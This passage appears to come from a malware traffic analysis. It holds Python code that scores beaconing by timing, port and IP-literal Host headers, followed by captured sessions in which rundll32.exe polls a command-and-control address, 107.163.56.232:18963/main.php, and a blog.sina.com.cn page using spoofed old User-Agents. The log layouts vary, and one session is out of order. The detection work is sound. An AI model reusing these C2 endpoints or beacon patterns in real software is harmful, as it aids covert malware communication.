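    (72, MAIN, "Dec 19, 2024 15:46:13.426078081 CET"),
    (73, SINA, "Dec 19, 2024 15:46:15.781593084 CET"),
    (74, MAIN, "Dec 19, 2024 15:46:17.631674051 CET"),
    (75, MAIN, "Dec 19, 2024 15:46:17.744081974 CET"),
    (76, SINA, "Dec 19, 2024 15:46:17.745194912 CET"),
]
STANDARD_HTTP_PORTS = {80, 443, 8000, 8080, 8443}  # assumption: site policy


def parse_timestamp(text):
    """Parse 'Dec 19, 2024 15:45:52.910507917 CET'. datetime holds only
    microseconds, so the nanosecond tail is truncated; the zone name is
    dropped because every timestamp on the page shares it."""
    head, tail = text.rsplit(".", 1)
    frac = tail.split(" ", 1)[0]
    stamp = datetime.strptime(head, "%b %d, %Y %H:%M:%S")
    return stamp.replace(microsecond=int(frac[:6].ljust(6, "0")))


def collapse_bursts(times, gap=1.0):
    """Merge requests closer than `gap` seconds and return each burst's start
    (the trace fetches /main.php twice within ~0.2 s per cycle)."""
    times = sorted(times)
    starts, last = [times[0]], times[0]
    for t in times[1:]:
        if t - last >= gap:
            starts.append(t)
        last = t
    return starts


def periodicity(starts, tolerance=0.25):
    """Return (median gap, fraction of gaps within +/- tolerance of the median).
    Median-based scoring survives one delayed check-in; mean/stdev does not."""
    gaps = [b - a for a, b in zip(starts, starts[1:])]
    if len(gaps) < 3:
        return None, 0.0
    mid = median(gaps)
    return mid, sum(abs(g - mid) <= tolerance * mid for g in gaps) / len(gaps)


def host_is_ip_literal(host):
    """True for a 'Host: 107.163.56.232:18963' style header (IPv4 only here)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def analyze(sessions, min_bursts=4, min_regular=0.75):
    """Score each target; return (findings keyed by target, User-Agents seen)."""
    t0 = min(parse_timestamp(ts) for _, _, ts in sessions)
    by_target = defaultdict(list)
    for _sid, target, ts in sessions:
        by_target[target].append((parse_timestamp(ts) - t0).total_seconds())
    findings = {}
    for target, times in by_target.items():
        _ip, port, host, _path, _ua = target
        starts = collapse_bursts(times)
        mid, frac = periodicity(starts)
        findings[target] = {
            "requests": len(times),
            "bursts": len(starts),
            "median_gap_s": mid,
            "regular_fraction": frac,
            "periodic": len(starts) >= min_bursts and frac >= min_regular,
            "nonstandard_port": port not in STANDARD_HTTP_PORTS,
            "ip_literal_host": host_is_ip_literal(host),
        }
    return findings, {t[4] for t in by_target}
```

Calling analyze(SESSIONS) scores the /main.php target as periodic (six bursts, median gap about 4.17 s, every gap within 25 % of the median) on a non-standard port with an IP-literal Host. The blog.sina.com.cn target, with only seven requests and two irregular gaps in this short window, falls below the 75 % regularity threshold on its own, which is why a detection should also weigh the cheaper indicators: the same PID presenting two different and very old User-Agents, and the paired timing of the two targets.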
Session ID: 76 | Source IP: 192.168.2.11 | Source Port: 49823 | Destination IP: 116.133.8.92 | Destination Port: 80 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:17.745194912 CET | Bytes transferred: 118 | Direction: OUT | Data:
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Timestamp: Dec 19, 2024 15:46:19.448597908 CET | Bytes transferred: 371 | Direction: IN | Data:
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:46:19 GMT
Content-Type: text/html
Content-Length: 160
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.11 | 49825 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:21.657778978 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.11 | 49827 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:21.783348083 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.11 | 49828 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:23.531599045 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:46:25.304503918 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:46:25 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.11 | 49830 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:25.895533085 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:46:28.409642935 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:46:28 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.11 | 49831 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:25.896173954 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.11 | 49832 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:25.899857998 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.11 | 49835 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:29.903470993 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.11 | 49836 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:30.018723011 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.11 | 49837 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:30.019153118 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:46:32.407851934 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:46:32 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.11 | 49839 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:33.919154882 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.11 | 49840 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:34.040075064 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.11 | 49841 | 116.133.8.92 | 80 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:34.040631056 CET | 118 | OUT | GET /u/5762479093 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
    Host: blog.sina.com.cn
Dec 19, 2024 15:46:35.873550892 CET | 371 | IN | HTTP/1.1 302 Moved Temporarily
    Server: nginx/1.2.8
    Date: Thu, 19 Dec 2024 14:46:35 GMT
    Content-Type: text/html
    Content-Length: 160
    Connection: keep-alive
    Location: https://blog.sina.com.cn/u/5762479093
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.11 | 49843 | 107.163.56.232 | 18963 | 1232 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 15:46:37.935661077 CET | 183 | OUT | GET /main.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
    Host: 107.163.56.232:18963
    Cache-Control: no-cache


Session ID: 90 | Source IP: 192.168.2.11 | Source Port: 49844 | Destination IP: 116.133.8.92 | Destination Port: 80 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:38.058943033 CET | Bytes transferred: 118 | Direction: OUT
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Timestamp: Dec 19, 2024 15:46:39.809197903 CET | Bytes transferred: 371 | Direction: IN
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:46:39 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID: 91 | Source IP: 192.168.2.11 | Source Port: 49845 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:38.059036970 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 92 | Source IP: 192.168.2.11 | Source Port: 49847 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:41.653532982 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 93 | Source IP: 192.168.2.11 | Source Port: 49848 | Destination IP: 116.133.8.92 | Destination Port: 80 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:41.773252010 CET | Bytes transferred: 118 | Direction: OUT
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn


Session ID: 94 | Source IP: 192.168.2.11 | Source Port: 49849 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:41.773751974 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 95 | Source IP: 192.168.2.11 | Source Port: 49850 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:42.342484951 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 96 | Source IP: 192.168.2.11 | Source Port: 49851 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:42.342596054 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 97 | Source IP: 192.168.2.11 | Source Port: 49852 | Destination IP: 116.133.8.92 | Destination Port: 80 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:42.357618093 CET | Bytes transferred: 118 | Direction: OUT
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Timestamp: Dec 19, 2024 15:46:44.107714891 CET | Bytes transferred: 371 | Direction: IN
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:46:43 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID: 98 | Source IP: 192.168.2.11 | Source Port: 49854 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:46.467531919 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 99 | Source IP: 192.168.2.11 | Source Port: 49855 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:46.467701912 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 100 | Source IP: 192.168.2.11 | Source Port: 49856 | Destination IP: 116.133.8.92 | Destination Port: 80 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:46.467892885 CET | Bytes transferred: 118 | Direction: OUT
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Timestamp: Dec 19, 2024 15:46:48.311642885 CET | Bytes transferred: 371 | Direction: IN
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.8
Date: Thu, 19 Dec 2024 14:46:48 GMT
Content-Type: text/html
Content-Length: 160
Connection: keep-alive
Location: https://blog.sina.com.cn/u/5762479093
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


Session ID: 101 | Source IP: 192.168.2.11 | Source Port: 49859 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:50.482780933 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 102 | Source IP: 192.168.2.11 | Source Port: 49860 | Destination IP: 107.163.56.232 | Destination Port: 18963 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: Dec 19, 2024 15:46:50.618869066 CET | Bytes transferred: 183 | Direction: OUT
GET /main.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
Host: 107.163.56.232:18963
Cache-Control: no-cache


Session ID: 0 | Source IP: 192.168.2.11 | Source Port: 49731 | Destination IP: 116.133.8.92 | Destination Port: 443 | PID: 1232 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp: 2024-12-19 14:44:47 UTC | Bytes transferred: 142 | Direction: OUT
GET /u/5762479093 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: blog.sina.com.cn
Connection: Keep-Alive
Timestamp: 2024-12-19 14:44:49 UTC | Bytes transferred: 653 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 Dec 2024 14:44:48 GMT
Content-Type: text/html
Content-Length: 12839
Connection: close
Vary: Accept-Encoding
Origin-Agent-Cluster: ?0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Thu, 19 Dec 2024 14:44:47 GMT
Last-Modified: Thu, 19 Dec 2024 02:25:10 GMT+8
DPOOL_HEADER: 10.13.3.118
strict-transport-security: max-age=180
Content-Security-Policy: upgrade-insecure-requests
Age: 73178
X-Cache: HIT from fe1506ed4d61
Content-Security-Policy: upgrade-insecure-requests
X-Via-SSL: ssl.51.sinag1.hj4.lb.sinanode.com
Timestamp: 2024-12-19 14:44:49 UTC | Bytes transferred: 7579 | Direction: IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 46 61 6b 65 2d 4a 61 70 61 6e 65 73 65 5f e6
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="//www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Fake-Japanese_
